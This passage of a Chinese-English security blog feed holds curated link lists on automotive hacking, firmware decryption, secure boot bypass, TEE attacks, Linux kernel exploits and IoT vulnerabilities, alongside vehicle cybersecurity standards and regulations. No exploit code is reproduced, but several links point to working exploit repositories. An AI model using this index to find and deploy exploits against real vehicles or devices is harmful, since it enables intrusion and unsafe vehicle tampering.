Autonomous Driving Under Physical-World Attacks</a></li><li><a href="https://arxiv.org/pdf/2210.09482.pdf">You Can’t See Me: Physical Removal Attacks on LiDAR-based Autonomous Vehicles Driving Frameworks</a></li><li><a href="https://comma-ai.medium.com/hacking-an-audi-performing-a-man-in-the-middle-attack-on-flexray-2710b1d29f3f">Hacking an Audi: performing a man-in-the-middle attack on FlexRay</a></li><li><a href="https://eprint.iacr.org/2020/937.pdf">BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a></li><li><a href="https://www.ndss-symposium.org/ndss-program/autosec-2022">Automotive and Autonomous Vehicle Security (AutoSec) Workshop 2022</a></li><li><a href="https://www.projectgus.com/2022/06/bmw-f-series-gear-selector-part-one-failures/">BMW F Series Gear Selector, Part One: Failures</a> <a href="https://www.projectgus.com/2022/06/bmw-f-series-gear-selector-part-two-breakthrough/">Part Two: Breakthrough</a> <a href="https://www.projectgus.com/2022/07/bmw-f-series-gear-selector-part-three-success/">Part Three: Success</a></li><li><a href="https://www.cymotive.com/whats-inside-the-cancan-can-in-can-attack-for-bypassing-security/">CANCAN: Encapsulation of CAN-FD Messages for Circumvention of Security Measures</a> <a href="https://www.cymotive.com/wp-content/uploads/2022/06/CANCAN-Research-paper_-Matan-Ziv-Principal-Cybersecurity-Researcher-1.pdf">Paper</a></li><li><a href="http://p1kachu.pluggi.fr/project/automotive/2021/05/30/honda-oki-part1/">Dumping old ECUs</a></li><li><a href="https://haxor.fi/how-the-firmware-updates-work-on-toyota-touch-go/">How the firmware updates work on Toyota Touch & Go</a></li><li><a href="https://tech-en.netlify.app/articles/en513036/index.html">How to decrypt car firmware in unknown format</a></li><li><a href="https://dl.acm.org/doi/fullHtml/10.1145/3465481.3465748">Analyzing and Securing SOME/IP Automotive Services with Formal and Practical Methods</a></li><li><a href="https://www.sciencedirect.com/science/article/pii/S0167404821003357">Power jacking your station: In-depth security analysis of electric vehicle charging station management systems</a> <a href="https://www.anquanke.com/post/id/267126">Translation</a></li><li><a href="https://www.cs.bham.ac.uk/~garciaf/publications/BtB.pdf">Beneath the Bonnet: a Breakdown of Diagnostic Security</a></li><li><a href="https://visteon.com/wp-content/uploads/2019/01/securing-inter-processor-communication-in-automotive-ecus.pdf">Securing Inter-Processor Communication in Automotive ECUs</a></li><li><a href="https://github.com/jilleb/mqb-soundaktor">mqb-soundaktor: 010 Editor template to parse the contents of MQB Soundaktor data</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part1/">Hacking a VW Golf Power Steering ECU</a></li><li><a href="https://jazdw.net/tp20">VW Transport Protocol 2.0 (TP 2.0) for CAN bus</a></li><li><a href="https://hufman.github.io/stories/bmwconnectedapps">BMW Connected Apps Protocol</a> <a href="https://bbs.pediy.com/thread-257530-1.htm">Translation</a></li><li><a href="https://www.rapid7.com/blog/post/2017/07/11/building-a-car-hacking-development-workbench-part-1/">Building a Car Hacking Development Workbench</a></li><li><a href="https://sites.google.com/view/cav-sec/cvanalyzer">AD & CV Systems Security - CVAnalyzer</a></li><li><a href="https://github.com/OSUSecLab/CANHunter">CANHunter: a tool for extracting CAN bus commands from car companion mobile apps</a></li><li><a href="https://github.com/jilleb/mib2-toolbox/issues/122">mib2-toolbox: Building a new install method · Issue #122</a></li><li><a href="https://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html">Examining Log4j Vulnerabilities in Connected Cars and Charging Stations</a></li><li><a href="https://olegkutkov.me/2021/06/10/tesla-model-3-us-lte-modem-replacement-and-some-reverse-engineering/">Tesla Model 3 US – LTE modem replacement (And some reverse engineering)</a></li><li><a href="https://pulsesecurity.co.nz/articles/ducati-696-canbus">Practical CANBUS Reversing - Understanding the Ducati Monster</a></li><li><a href="https://pulsesecurity.co.nz/articles/ducati-can-bus">Adventures with the Ducati CAN bus</a></li><li><a href="https://xz.aliyun.com/t/9629">How to take down a smart car</a></li><li><a href="https://bbs.pediy.com/thread-265243.htm">An introduction to one type of T-Box (with ideas on gaining access)</a></li><li><a href="https://gorgias.me/2019/08/08/浅谈4G通信模组在车联网领域的攻击场景/">A brief discussion of attack scenarios for 4G communication modules in the IoV space</a></li><li><a href="https://osmocom.org/projects/quectel-modems/wiki/EC20">EC20 - Qualcomm Linux Modems by Quectel & Co - Open Source Mobile Communications</a></li><li><a href="https://www.blackmoreops.com/2016/06/02/hacking-qnx-systems-over-qconn/">Hacking QNX systems over QCONN</a></li><li><a href="https://skygo.360.cn/penetrate-intranet-via-tbox/">How hackers get into an automaker's intranet from the T-Box</a></li><li><a href="https://fn.lc/post/tesla-model-3/">Hacking my Tesla Model 3 - Security Overview</a></li><li><a href="https://fn.lc/post/tesla-model-3-services/">Hacking my Tesla Model 3 - Internal API</a></li><li><a href="https://fn.lc/post/tesla-model-3-modes/">Hacking my Tesla Model 3 - Software Modes</a></li><li><a href="https://mp.weixin.qq.com/s/JNQIySegvXJ7QMFTe7cmJg">Tracing the source of a malicious attack on an IoV platform</a></li><li><a href="http://plcscan.org/blog/2020/11/china-internet-of-vehicles-security-threat-analysis-report/">Security threat analysis report on domestic online IoV platforms (road transport vehicle satellite positioning systems)</a></li><li><a href="http://illmatics.com/Remote%20Car%20Hacking.pdf">Remote Car Hacking</a></li><li><a href="https://ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf">Adventures in Automotive Networks and Control Units</a></li><li><a href="https://www.kiwisec.com/news/detail/5d3ab544c649181e28b820a7.html">Analysis of smart car security risks and protection technologies</a></li><li><a href="https://www.usenix.org/legacy/events/sec10/tech/full_papers/Rouf.pdf">Security and Privacy Vulnerabilities of In-Car Wireless Networks: A Tire Pressure Monitoring System Case Study</a></li><li><a href="https://www.lookout.com/blog/hacking-a-tesla">Hacking a Tesla Model S: What we found and what we learned</a></li><li><a href="https://olegkutkov.me/2021/06/10/tesla-model-3-us-lte-modem-replacement-and-some-reverse-engineering/">Tesla Model 3 US – LTE modem replacement (And
some reverse engineering)</a></li><li><a href="https://www.downtowndougbrown.com/2022/08/solving-my-trucks-tpms-sensor-problem-with-the-help-of-an-rtl-sdr-dongle/">Solving my truck’s TPMS sensor problem with the help of an RTL-SDR dongle</a></li><li><a href="https://www.usenix.org/conference/woot16/workshop-program/presentation/burakova">Truck Hacking: An Experimental Analysis of the SAE J1939 Standard</a></li><li><a href="http://www.autosec.org/publications.html">Automotive Embedded Systems Security (CAESS) </a></li><li><a href="https://etheses.bham.ac.uk/id/eprint/11516/1/VandenHerrewegen2021PhD.pdf">AUTOMOTIVE FIRMWARE EXTRACTION AND ANALYSIS TECHNIQUE</a></li><li><a href="http://www.autosec.org/pubs/cars-oakland2010.pdf">Experimental Security Analysis of a Modern Automobile</a></li><li><a href="http://opengarages.org/index.php/Main_Page">opengarages.org</a></li><li><a href="http://illmatics.com/carhacking.html">illmatics</a></li></ul><h2 id="会议"><a href="#会议" class="headerlink" title="会议"></a>会议</h2><ul><li><a href="https://media.ccc.de/v/37c3-12144-back_in_the_driver_s_seat_recovering_critical_data_from_tesla_autopilot_using_voltage_glitching">Back in the Driver’s Seat - Recovering Critical Data from Tesla Autopilot Using Voltage Glitching</a></li></ul><h2 id="论文"><a href="#论文" class="headerlink" title="论文"></a>论文</h2><ul><li><a href="https://arxiv.org/abs/2311.16024">MadRadar: A Black-Box Physical Layer Attack Framework on mmWave Automotive FMCW Radars</a></li><li><a href="https://www.brokenwire.fail/">Brokenwire Attack</a></li><li><a href="https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=10210500">Trusted Operations of a Military Ground Robot in the Face of Man-in-the-Middle Cyberattacks Using Deep Learning Convolutional Neural Networks: Real-Time Experimental Outcomes</a></li><li><a href="https://dl.acm.org/doi/10.1145/3488932.3523263">ShadowAuth: Backward-Compatible Automatic CAN Authentication for Legacy ECUs</a> <a 
href="https://github.com/purseclab/ShadowAuth">Github</a></li><li><a href="https://www.ndss-symposium.org/wp-content/uploads/2023/02/vehiclesec2023-23066-paper.pdf">Cooperative Perception for Safe Control of Autonomous Vehicles under LiDAR Spoofing Attacks</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/garcia">Lock It and Still Lose It —on the (In)Security of Automotive Remote Keyless Entry Systems</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity19/presentation/kulandaivel">CANvas: Fast and Inexpensive Automotive Network Mapping</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity21/presentation/hu-shengtuo">Automated Discovery of Denial-of-Service Vulnerabilities in Connected Vehicle Protocols</a></li><li><a href="https://securepositioning.com/ghost-peak/">Ghost Peak: Practical Distance Reduction Attacks Against HRP UWB Ranging</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity21/presentation/groza">CANARY - a reactive defense mechanism for Controller Area Networks based on Active RelaYs</a></li></ul><h2 id="标准"><a href="#标准" class="headerlink" title="标准"></a>标准</h2><ul><li><a href="https://www.miit.gov.cn/api-gateway/jpaas-web-server/front/document/file-download?fileUrl=/cms_files/filemanager/1226211233/attach/20233/813c94607c204368aef325ffdd37f975.docx&fileName=1.《汽车整车信息安全技术要求》(征求意见稿).docx">《汽车整车信息安全技术要求》(征求意见稿)</a></li><li><a href="https://www.miit.gov.cn/cms_files/filemanager/1226211233/attach/20226/84d58a01e7fa48f4ad873d66542f2b1d.docx">《汽车软件升级通用技术要求》(征求意见稿)</a></li><li>ISO 26262 Road vehicles — Functional safety</li><li>SAE J3601 Cybersecurity Guidebook for Cyber-Physical Vehicle System</li><li><a href="https://www.iso.org/standard/70918.html">ISO/SAE 21434 Road vehicles — Cybersecurity engineering</a></li><li><a href="https://www.iso.org/standard/80840.html">ISO/PAS 5112:2022 Road vehicles — Guidelines for auditing cybersecurity 
engineering</a></li><li><a href="https://unece.org/sites/default/files/2021-03/R155e.pdf">WP.29 R155 Cyber security and Cyber Security Management System</a></li><li><a href="https://unece.org/sites/default/files/2021-03/R156e.pdf">WP.29 R156 Software Update Management System</a></li><li><a href="https://img.auto-testing.net/testingimg/202003/19/071723321.pdf">ISO 21448 SOTIF(预期功能安全)</a></li><li><a href="https://std.samr.gov.cn/gb/search/gbDetailed?id=0407B86E18DF0603E06397BE0A0A9871">GB 智能网联汽车时空数据安全处理基本要求(征求意见)</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=4D3C5BB193E079AD54294E5845749B8F">GB/T 41871-2022 信息安全技术 汽车数据处理安全要求</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=5D7C9B95DB5F844C84F2F6C08843E2BB">GB/T 41578-2022 电动汽车充电系统信息安全技术要求及试验方法</a> <a href="http://www.catarc.org.cn/upload/202009/11/202009111637288030.pdf">征求意见稿</a></li><li><a href="http://www.ttbz.org.cn/Pdfs/Index/?ftype=st&pms=62910">T/CSAE 252—2022 智能网联汽车车载端信息安全测试规程</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=AC47DD65376598FB44E0F24FBEBBF769">GB/T 40855-2021 电动汽车远程服务与管理系统信息安全技术要求及试验方法</a></li><li><a href="http://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=9995D55CBCAE667570C36F6A6CD1712D">GB/T 40856-2021 车载信息交互系统信息安全技术要求及试验方法</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=2977F0AC1719BBEFB9649C0146B0FC55">GB/T 40857-2021 汽车网关信息安全技术要求及试验方法</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=CCE2A169871500F8029A9CBB314D9FB8">GB/T 40861-2021 汽车信息安全通用技术要求</a></li><li><a href="http://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=59F8899E944C9ED52288FE5E0146C621">GB/T 38628-2020 信息安全技术 汽车电子系统网络安全指南</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=5D7C9B95DB5F844C84F2F6C08843E2BB">GB/T 41578-2022 电动汽车充电系统信息安全技术要求及试验方法</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=5D7C9B95DB5F844C84F2F6C08843E2BB">GB/T 41578-2022: 
电动汽车充电系统信息安全技术要求及试验方法</a></li><li><a href="https://www.cec.org.cn/upload/file/biaozhunhua/zhongdianlianbiaozhun/2019-09-29/508a7dfb58b92835782493dba29c5b54.pdf">T/CEC 208—2019 电动汽车充电设施信息安全技术规范</a></li><li><a href="https://www.tc260.org.cn/upload/2024-03-07/1709778432492016688.pdf">TC260-PG-20241A 网络安全标准实践指南—车外画面局部轮廓化处理效果验证</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=4D3C5BB193E079AD54294E5845749B8F">GB/T 41871-2022 信息安全技术 汽车数据处理安全要求</a></li><li><a href="https://fjca.miit.gov.cn/cms_files/filemanager/450000788/attach/202210/bef32acc93c2405f9416ba7a5c3b6797.pdf">T/CCSA 339—2021 车联网网络安全防护定级备案实施指南</a></li></ul><h2 id="法规"><a href="#法规" class="headerlink" title="法规"></a>法规</h2><ul><li><a href="https://www.miit.gov.cn/jgsj/zbys/wjfb/art/2022/art_6d41506a06b9455092531a20f745f5a2.html">工业和信息化部办公厅 公安部办公厅 交通运输部办公厅 应急管理部办公厅 国家市场监督管理总局办公厅关于进一步加强新能源汽车企业安全体系建设的指导意见</a></li><li><a href="http://www.gov.cn/zhengce/zhengceku/2021-08/12/content_5630912.htm">工业和信息化部关于加强智能网联汽车生产企业及产品准入管理的意见</a></li><li><a href="http://www.cac.gov.cn/2021-11/14/c_1638501991577898.htm">网络数据安全管理条例(征求意见稿)</a></li><li><a href="https://www.miit.gov.cn/jgsj/waj/wjfb/art/2021/art_075b1bb3761943af96c4af9df4b4fb5b.html">工业和信息化部关于加强车联网卡实名登记管理的通知</a></li><li><a href="https://www.miit.gov.cn/jgsj/waj/wjfb/art/2021/art_27e00721fb6441fe99e9e2243bdccc78.html">工业和信息化部关于加强车联网网络安全和数据安全工作的通知</a></li><li><a href="http://www.miit-eidc.org.cn/art/2021/9/13/art_54_14395.html">关于开展汽车数据安全、网络安全等自查工作的通知</a></li><li><a href="http://www.cac.gov.cn/2021-08/20/c_1631049984897667.htm">汽车数据安全管理若干规定(试行)</a></li><li><a href="http://www.cac.gov.cn/2021-04/29/c_1621273432655484.htm">信息安全技术 网联汽车 采集数据的安全要求</a></li><li><a href="http://www.samr.gov.cn/zw/zh/202106/t20210604_330221.html">市场监管总局质量发展局关于汽车远程升级(OTA)技术召回备案的补充通知</a></li><li><a href="http://www.samr.gov.cn/zw/zh/202011/t20201125_323858.html">市场监管总局办公厅关于进一步加强汽车远程升级(OTA)技术召回监管的通知</a></li><li><a 
href="https://www.gov.cn/gongbao/content/2019/content_5380357.htm">道路机动车辆生产企业及产品准入管理办法</a> <a href="https://ythzxfw.miit.gov.cn/lawGuide?data=09c77831bd834a8fbec388a325dfb187">办事指南</a></li><li><a href="https://www.gov.cn/gongbao/content/2021/content_5641351.htm">网络产品安全漏洞管理规定</a></li></ul><h2 id="部委通知公告"><a href="#部委通知公告" class="headerlink" title="部委通知公告"></a>部委通知公告</h2><ul><li><a href="https://www.miit.gov.cn/jgsj/zbys/wjfb/art/2023/art_4a67648dc58e483bab554f97045a8579.html">工业和信息化部 公安部 住房和城乡建设部 交通运输部关于开展智能网联汽车准入和上路通行试点工作的通知 </a> <a href="https://wap.miit.gov.cn/jgsj/zbys/qcgy/art/2023/art_b3eb84d0090b462892ce0a41baf05bcb.html">图文解读</a></li></ul><h2 id="白皮书"><a href="#白皮书" class="headerlink" title="白皮书"></a>白皮书</h2><ul><li><a href="https://documents.trendmicro.com/assets/white_papers/wp-a-roadmap-to-secure-connected-cars.pdf">Identifying Cybersecurity Focus Areas in Connected Cars Based on WP.29 UN R155 Attack Vectors and Beyond</a></li><li><a href="https://mp.weixin.qq.com/s/IL1fIpylqImFie-vQcLDOg">腾讯安全《车联网数据安全体系建设指南》</a> <a href="https://share.weiyun.com/Wupmgp7r">附件</a></li><li><a href="http://qr61.cn/ooC4z0/q92oj9P">CSTC 智能网联汽车安全渗透白皮书 3.0(2022年)</a></li><li><a href="https://www.cstc.org.cn/zhinengwanglianqicheanquanshentoubaipishu2.0.pdf">CSTC 智能网联汽车安全渗透白皮书 2.0(2021年)</a></li><li><a href="https://www.ccidgroup.com/system/_content/download.jsp?urltype=news.DownloadAttachUrl&owner=1661492338&wbfileid=4701729">CSTC 智能网联汽车安全渗透白皮书(2020年)</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201912/P020191226516585677051.pdf">车联网白皮书(C-V2X分册)2019</a></li><li><a href="https://book.yunzhan365.com/juql/lfws/mobile/index.html">《智能网联汽车信息安全评测白皮书 2019》</a></li><li><a href="https://www.tc260.org.cn/file/qcdz.pdf">汽车电子网络安全标准化白皮书 2018</a></li></ul><h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>指南</h2><ul><li><a href="https://www.tc260.org.cn/file/jswj01.pdf">TC260-001《汽车采集数据处理安全指南》</a></li><li><a 
href="https://www.tc260.org.cn/file/2020-11-10/d7f8726e-d793-4ac2-8a5e-1a2ae701dd66.pdf">信息安全技术 网络预约汽车服务数据安全指南</a></li><li><a href="http://www.caict.ac.cn/xwdt/ynxw/202109/t20210924_390286.htm">《车联网身份认证和安全信任试点技术指南(1.0)》</a></li><li><a href="https://www.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2022/art_e36a55c43a3346c9a4b31e534b92be44.html">车联网网络安全和数据安全标准体系建设指南</a></li></ul><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><ul><li><a href="https://github.com/collin80/SavvyCAN">SavvyCAN</a></li><li><a href="https://www.csselectronics.com/screen/page/can-logger-resources">CANEDGE</a></li><li><a href="https://github.com/jglim/OkayCAN">OkayCAN: The okayest ESP32-S2 CAN development board</a></li><li><a href="https://bitbucket.org/{944e74bb-4ed6-4df9-b1bb-d7581db48176}/">Dataspeed Autonomous Vehicle</a></li><li><a href="https://github.com/bri3d/VW_Flash">VW_Flash: Flashing tools for VW AG control units over UDS</a></li><li><a href="https://www.csselectronics.com/pages/obd2-pid-table-on-board-diagnostics-j1979">OBD2 PID Overview</a></li><li><a href="https://unlockecu.sn.sg/">UnlockECU</a></li></ul>]]></content>
<summary type="html"><p><a href="https://delikely.github.io/Automotive-Security-Timeline/">Automotive Security Incident Timeline</a>: <a href="https://delikely.github.io/Automotive-Securi</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Firmware Analysis</title>
<link href="http://delikely.github.io/2099/01/01/firmware/"/>
<id>http://delikely.github.io/2099/01/01/firmware/</id>
<published>2099-01-01T11:30:00.000Z</published>
<updated>2023-07-29T13:57:42.582Z</updated>
<content type="html"><![CDATA[<h2 id="固件解密"><a href="#固件解密" class="headerlink" title="固件解密"></a>Firmware Decryption</h2><ul><li><a href="https://0x434b.dev/breaking-the-d-link-dir3060-firmware-encryption-static-analysis-of-the-decryption-routine-part-2-1/">Breaking the D-Link DIR3060 Firmware Encryption - Static analysis of the decryption routine - Part 2.1</a></li><li><a href="https://fastcall.medium.com/dumping-firmware-from-a-router-5d7e819199fd">Dumping firmware from a router</a></li><li><a href="https://paper.seebug.org/1651/">Encrypted firmware: decrypting with the help of an older firmware version</a></li><li><a href="https://www.anquanke.com/post/id/246659">Linksys EA6100 firmware decryption analysis</a></li><li><a href="https://www.jsof-tech.com/unpacking-hp-firmware-updates-part-1/">Unpacking HP Firmware Updates</a></li><li><a href="https://0x00sec.org/t/breaking-the-d-link-dir3060-firmware-encryption-recon-part-1/21943">Breaking the D-Link DIR3060 Firmware Encryption - Recon - Part 1</a></li><li><a href="https://0x00sec.org/t/breaking-the-d-link-dir3060-firmware-encryption-static-analysis-of-the-decryption-routine-part-2-1/22099">Breaking the D-Link DIR3060 Firmware Encryption - Static analysis of the decryption routine - Part 2.1</a></li></ul><h2 id="安全启动"><a href="#安全启动" class="headerlink" title="安全启动"></a>Secure Boot</h2><ul><li><a href="https://research.nccgroup.com/2022/10/03/shining-new-light-on-an-old-rom-vulnerability/">Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices</a></li><li><a href="https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html">Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu</a></li><li><a href="https://cyberintel.es/publications/2022-12-07_BlackHat_Europe_pub/">Vlind Glitch: A Blind VCC Glitching Technique to Bypass the Secure Boot of the Qualcomm MSM8916 Mobile SoC</a></li><li><a href="https://fredericb.info/2021/02/amlogic-usbdl-unsigned-code-loader-for-amlogic-bootrom.html">amlogic-usbdl : unsigned code loader for Amlogic BootROM</a></li>
<li><a href="https://raelize.com/posts/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/">Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)</a></li><li><a href="https://limitedresults.com/2019/11/pwn-the-esp32-forever-flash-encryption-and-sec-boot-keys-extraction/">Pwn the ESP32 Forever: Flash Encryption and Sec. Boot Keys Extraction (CVE-2019-17391)</a></li><li><a href="https://limitedresults.com/2019/09/pwn-the-esp32-secure-boot/">Pwn the ESP32 Secure Boot</a></li><li><a href="https://limitedresults.com/2019/08/pwn-the-esp32-crypto-core/">Pwn the ESP32 crypto-core</a></li><li><a href="https://limitedresults.com/2020/01/nuvoton-m2351-mkrom-armv8-m-trustzone/">Nuvoton M2351 MKROM</a></li><li><a href="https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/">CVE-2020-10713 BootHole: THERE’S A HOLE IN THE BOOT</a></li></ul><h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><ul><li><a href="https://research.nccgroup.com/2022/11/17/cve-2022-45163/">NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)</a></li><li><a href="http://analogman.info/index.php/2019/01/20/bypass-secure-usb-debugging-prompt-on-phone-with-broken-screen/">Bypass secure USB debugging prompt on phone with broken screen</a></li><li><a href="https://www.riverloopsecurity.com/blog/2020/10/hw-101-glitching/">Hardware Hacking 101: Glitching into Privileged Shells</a></li></ul><h2 id="TEE"><a href="#TEE" class="headerlink" title="TEE"></a>TEE</h2><ul><li><a href="https://services.google.com/fh/files/misc/intel_tdx_-_full_report_041423.pdf">Intel Trust Domain Extensions (TDX) Security Review</a></li><li><a href="https://www.synacktiv.com/en/publications/kinibi-tee-trusted-application-exploitation.html">Kinibi TEE: Trusted Application exploitation</a></li><li><a href="https://www.synopsys.com/blogs/software-security/cve-2020-7958-trustlet-tee-attack/">CyRC analysis: CVE-2020-7958 biometric data extraction in Android devices</a></li>
<li><a href="https://cyberintel.es/publications/2022-11-17_DeepSec_pub/">Auditing Closed Source Trusted Applications for Qualcomm Secure Execution Environment (QSEE) | Cyber Intelligence</a></li><li><a href="https://research.checkpoint.com/2022/researching-xiaomis-tee/">Researching Xiaomi’s TEE to get to Chinese money</a></li><li><a href="https://github.com/shakevsky/keybuster">keybuster: a research tool that allows to interact with the Keymaster TA (Trusted Application) on Samsung devices</a></li><li><a href="https://blog.zimperium.com/multiple-kernel-vulnerabilities-affecting-all-qualcomm-devices/">Kernel Vulnerabilities Affecting All Qualcomm Devices</a></li><li><a href="https://limitedresults.com/2020/01/nuvoton-m2351-mkrom-armv8-m-trustzone/">Nuvoton M2351 MKROM</a></li><li><a href="https://toothless.co/blog/bootloader-bypass-part1/">NXP LPC1343 Bootloader Bypass (Part 1) - Communicating with the bootloader</a></li><li><a href="https://toothless.co/blog/bootloader-bypass-part2/">NXP LPC1343 Bootloader Bypass (Part 2) - Dumping firmware with Python and building the logic for the glitcher</a></li><li><a href="https://toothless.co/blog/bootloader-bypass-part3/">NXP LPC1343 Bootloader Bypass (Part 3) - Putting it all together</a></li><li><a href="https://raelize.com/blog/qualcomm-ipq40xx-analysis-of-critical-qsee-vulnerabilities/">Qualcomm IPQ40xx: Analysis of Critical QSEE Vulnerabilities</a></li></ul><h2 id="固件分析"><a href="#固件分析" class="headerlink" title="固件分析"></a>Firmware Analysis</h2><ul><li><a href="https://rdomanski.github.io/Reverse-engineering-of-ARM-Microcontrollers/">Reverse engineering of ARM microcontrollers</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/07/nand-dump-repair/">Repairing a Broken Huawei NAND Dump and Single-Bit Errors</a></li><li><a href="https://www.anquanke.com/post/id/233361">Load address analysis of Zyxel device eCos firmware</a></li><li><a href="https://bbs.pediy.com/thread-267719.htm">Firmware security: load address analysis</a></li>
<li><a href="http://www.righto.com/2020/09/reverse-engineering-first-fpga-chip.html">Reverse-engineering the first FPGA chip, the XC2064</a></li><li><a href="https://boredpentester.com/reversing-esp8266-firmware-part-1/">Reversing ESP8266 Firmware</a></li><li><a href="https://scriptingxss.gitbook.io/firmware-security-testing-methodology/v/zhong-wen-fstm/">OWASP Firmware Security Testing Methodology (Chinese edition)</a></li></ul><h2 id="内核漏洞"><a href="#内核漏洞" class="headerlink" title="内核漏洞"></a>Kernel Vulnerabilities</h2><ul><li><a href="https://github.com/lrh2000/StackRot">StackRot: CVE-2023-3269: Linux kernel privilege escalation vulnerability</a></li><li><a href="https://github.com/Liuk3r/CVE-2023-32233">CVE-2023-32233: a security vulnerability in the Linux kernel</a></li><li><a href="https://1day.dev/notes/Linux-Kernel-n-day-exploit-development/">CVE-2020-27786 | Linux Kernel n-day exploit development</a></li><li><a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html?m=1">Exploiting CVE-2022-42703 - Bringing back the stack attack</a></li><li><a href="https://research.nccgroup.com/2023/02/06/rustproofing-linux-part-1-4-leaking-addresses/">Rustproofing Linux (Part 1/4 Leaking Addresses)</a></li><li><a href="https://github.com/TH3xACE/SUDO_KILLER">SUDO_KILLER: A tool to identify and exploit sudo rules’ misconfigurations and vulnerabilities within sudo for linux privilege escalation</a></li><li><a href="https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story">Kernel Pwning with eBPF: a Love Story</a></li><li><a href="https://flatt.tech/assets/reports/210401_pwn2own/whitepaper.pdf">PWN2OWN Local Escalation of Privilege Category Ubuntu Desktop Exploit</a></li><li><a href="https://github.com/tr3ee/CVE-2021-4204">CVE-2021-4204: Linux Kernel eBPF Local Privilege Escalation</a></li><li><a href="https://accessvector.net/2022/linux-itimers-uaf?s=09">Racing Cats to the Exit: A Boring Linux Kernel Use-After-Free</a></li>
<li><a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/">How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables</a></li><li><a href="https://blog.exodusintel.com/2022/12/19/linux-kernel-exploiting-a-netfilter-use-after-free-in-kmalloc-cg/">Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg</a></li></ul><h2 id="IPC"><a href="#IPC" class="headerlink" title="IPC"></a>IPC</h2><ul><li><a href="https://cutesmilee.github.io/kernel/linux/android/2022/02/17/cve-2019-2215_writeup.html">CVE-2019-2215 | Android Binder UAF allows an elevation of privilege from an application to the Linux Kernel</a></li></ul>]]></content>
<summary type="html"><h2 id="固件解密"><a href="#固件解密" class="headerlink" title="固件解密"></a>Firmware Decryption</h2><ul>
<li><a href="https://0x434b.dev/breaking-the-d-link-dir3060-</summary>
<category term="IOT" scheme="http://delikely.github.io/tags/IOT/"/>
</entry>
<entry>
<title>IOT Vulnerability Collection</title>
<link href="http://delikely.github.io/2099/01/01/IOT-Vulns/"/>
<id>http://delikely.github.io/2099/01/01/IOT-Vulns/</id>
<published>2099-01-01T11:00:00.000Z</published>
<updated>2024-05-26T17:13:02.297Z</updated>
<content type="html"><![CDATA[<h2 id="2024"><a href="#2024" class="headerlink" title="2024"></a>2024</h2><ul><li><a href="https://voidstarsec.com/blog/jtag-pifex">JTAG Hacking with a Raspberry Pi - Introducing the PiFex</a></li><li><a href="https://blog.oversecured.com/20-Security-Issues-Found-in-Xiaomi-Devices/#settings---binding-arbitrary-services-with-system-privileges">20 Security Issues Found in Xiaomi Devices</a></li><li><a href="https://blog.lleavesg.top/article/Android-DirtyStream">Android DirtyStream vulnerability: a detailed explanation</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/05/01/dirty-stream-attack-discovering-and-mitigating-a-common-vulnerability-pattern-in-android-apps/?utm_source=pocket_reader">“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps</a></li><li><a href="https://boschko.ca/tp-link-tddp-bof/">TP-Link TDDP Buffer Overflow Vulnerability</a></li><li><a href="https://github.com/TheOfficialFloW/PPPwn">TheOfficialFloW/PPPwn: PPPwn - PlayStation 4 PPPoE RCE</a></li><li><a href="https://www.synacktiv.com/publications/arlo-im-watching-you">Arlo: I’m watching you</a></li><li><a href="https://github.blog/2024-03-18-gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/">Gaining kernel code execution on an MTE-enabled Pixel 8</a></li><li><a href="https://bishopfox.com/blog/breaking-fortinet-firmware-encryption">Breaking Fortinet Firmware Encryption</a></li><li><a href="https://labs.ioactive.com/2024/02/exploring-amd-platform-secure-boot.html">Exploring AMD Platform Secure Boot</a></li><li><a href="https://bbs.kanxue.com/thread-260399.htm">A brief analysis of Secure Boot</a></li><li><a 